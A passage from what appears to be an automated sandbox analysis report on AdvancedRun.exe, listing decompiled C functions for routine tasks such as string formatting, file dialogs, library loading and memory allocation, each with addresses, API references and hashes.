                                                                  0x004051b7

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintfmemcpy
                                                                  • String ID: %2.2X
                                                                  • API String ID: 2789212964-323797159
                                                                  • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                  • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                  • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                  • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 43%
                                                                  			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}









                                                                  0x004075bb
                                                                  0x004075c2
                                                                  0x004075c7
                                                                  0x004075ca
                                                                  0x004075cd
                                                                  0x004075d8
                                                                  0x004075e9
                                                                  0x004075fc
                                                                  0x00407600
                                                                  0x00407601
                                                                  0x00407606
                                                                  0x00407609
                                                                  0x0040760e
                                                                  0x00407619
                                                                  0x0040761e
                                                                  0x0040761f
                                                                  0x00407624
                                                                  0x00407636

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintf
                                                                  • String ID: %%-%d.%ds
                                                                  • API String ID: 3988819677-2008345750
                                                                  • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                  • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                  • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                  • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}















                                                                  0x00405080
                                                                  0x00405086
                                                                  0x0040508b
                                                                  0x0040508e
                                                                  0x00405091
                                                                  0x00405097
                                                                  0x0040509d
                                                                  0x004050a4
                                                                  0x004050ab
                                                                  0x004050b2
                                                                  0x004050b5
                                                                  0x004050bc
                                                                  0x004050cb
                                                                  0x004050e0
                                                                  0x004050cd
                                                                  0x004050d1
                                                                  0x004050dc
                                                                  0x004050dc

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FileNameOpenwcscpy
                                                                  • String ID: L
                                                                  • API String ID: 3246554996-2909332022
                                                                  • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                  • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                  • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                  • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 58%
                                                                  			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}







                                                                  0x00409072
                                                                  0x00409074
                                                                  0x0040907d
                                                                  0x00409086
                                                                  0x0040908e
                                                                  0x004090a5
                                                                  0x004090a5
                                                                  0x0040908e
                                                                  0x004090ac

                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID: LookupAccountSidW$Y@
                                                                  • API String ID: 190572456-2352570548
                                                                  • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                  • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                  • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                  • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 37%
                                                                  			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}







                                                                  0x0040ad8c
                                                                  0x0040ad93
                                                                  0x0040ad95
                                                                  0x0040ad9d
                                                                  0x0040ada5
                                                                  0x0040adb2
                                                                  0x0040adb2
                                                                  0x0040adb5
                                                                  0x0040adbf

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                  • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                  • String ID: shlwapi.dll
                                                                  • API String ID: 4092907564-3792422438
                                                                  • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                  • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                  • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                  • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                  0x00406597
                                                                  0x00406598
                                                                  0x004065a0
                                                                  0x004065aa
                                                                  0x004065ac
                                                                  0x004065ac
                                                                  0x004065bd

                                                                  APIs
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • wcsrchr.MSVCRT ref: 004065A0
                                                                  • wcscat.MSVCRT ref: 004065B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                                  • String ID: _lng.ini
                                                                  • API String ID: 383090722-1948609170
                                                                  • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                  • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                  • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                  • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                  0x0040ac59
                                                                  0x0040ac60
                                                                  0x0040ac68
                                                                  0x0040ac6d
                                                                  0x0040ac75
                                                                  0x0040ac7b
                                                                  0x00000000
                                                                  0x0040ac7b
                                                                  0x0040ac6d
                                                                  0x0040ac80

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                  • API String ID: 946536540-880857682
                                                                  • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                  • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                  • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                  • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 90%
                                                                  			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}





                                                                  0x00406670
                                                                  0x0040667a
                                                                  0x00406680
                                                                  0x00406686
                                                                  0x0040668b
                                                                  0x0040668d
                                                                  0x00406693
                                                                  0x00406699
                                                                  0x0040669f
                                                                  0x004066a9
                                                                  0x004066ac
                                                                  0x004066af
                                                                  0x004066b9
                                                                  0x004066c7
                                                                  0x004066d9
                                                                  0x004066c9
                                                                  0x004066c9
                                                                  0x004066cc
                                                                  0x004066cf
                                                                  0x004066d2
                                                                  0x004066d5
                                                                  0x004066d5
                                                                  0x004066db
                                                                  0x004066dd
                                                                  0x004066e0
                                                                  0x004066e8
                                                                  0x004066fa
                                                                  0x004066ea
                                                                  0x004066ea
                                                                  0x004066ed
                                                                  0x004066f0
                                                                  0x004066f3
                                                                  0x004066f6
                                                                  0x004066f6
                                                                  0x004066fc
                                                                  0x004066fe
                                                                  0x00406701
                                                                  0x00406709
                                                                  0x0040671b
                                                                  0x0040670b
                                                                  0x0040670b
                                                                  0x0040670e
                                                                  0x00406711
                                                                  0x00406714
                                                                  0x00406717
                                                                  0x00406717
                                                                  0x0040671d
                                                                  0x0040671f
                                                                  0x00406722
                                                                  0x0040672a
                                                                  0x0040673c
                                                                  0x0040672c
                                                                  0x0040672c
                                                                  0x0040672f
                                                                  0x00406732
                                                                  0x00406735
                                                                  0x00406738
                                                                  0x00406738
                                                                  0x0040673f
                                                                  0x00406745

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$memset
                                                                  • String ID:
                                                                  • API String ID: 1860491036-0
                                                                  • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                  • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                  • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                  • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}















                                                                  0x004054ea
                                                                  0x004054ec
                                                                  0x004054f1
                                                                  0x004054f4
                                                                  0x004054f7
                                                                  0x004054fa
                                                                  0x004054fe
                                                                  0x00405501
                                                                  0x00405505
                                                                  0x00405508
                                                                  0x0040550b
                                                                  0x0040551b
                                                                  0x0040550d
                                                                  0x0040550f
                                                                  0x0040550f
                                                                  0x00405521
                                                                  0x00405527
                                                                  0x0040552b
                                                                  0x0040552e
                                                                  0x0040553f
                                                                  0x00405530
                                                                  0x00405532
                                                                  0x00405532
                                                                  0x00405556
                                                                  0x00405561
                                                                  0x0040556e
                                                                  0x00405571
                                                                  0x00405578
                                                                  0x0040557e

                                                                  APIs
                                                                  • wcslen.MSVCRT ref: 004054EC
                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                    • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                    • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                    • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                  • memcpy.MSVCRT ref: 00405556
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: free$memcpy$mallocwcslen
                                                                  • String ID:
                                                                  • API String ID: 726966127-0
                                                                  • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                  • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                  • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                  • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 81%
                                                                  			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}













                                                                  0x00405adf
                                                                  0x00405ae6
                                                                  0x00405af5
                                                                  0x00405af6
                                                                  0x00405afb
                                                                  0x00405b00
                                                                  0x00405b0a
                                                                  0x00405b18
                                                                  0x00405b19
                                                                  0x00405b1e
                                                                  0x00405b2c
                                                                  0x00405b2d
                                                                  0x00405b36
                                                                  0x00405b37
                                                                  0x00405b3c
                                                                  0x00405b4a
                                                                  0x00405b4b
                                                                  0x00405b54
                                                                  0x00405b55
                                                                  0x00405b5a
                                                                  0x00405b68
                                                                  0x00405b69
                                                                  0x00405b72
                                                                  0x00405b73
                                                                  0x00405b7b
                                                                  0x00000000
                                                                  0x00405b7b
                                                                  0x00405b80

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@
                                                                  • String ID:
                                                                  • API String ID: 1033339047-0
                                                                  • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                  • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                  • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                  • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Analysis Process: AdvancedRun.exe PID: 5528 Parent PID: 3192 AdvancedRun.exeCOMMON

                                                                  Execution Graph

                                                                  Execution Coverage:9.5%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:1983
                                                                  Total number of Limit Nodes:24

                                                                  Graph

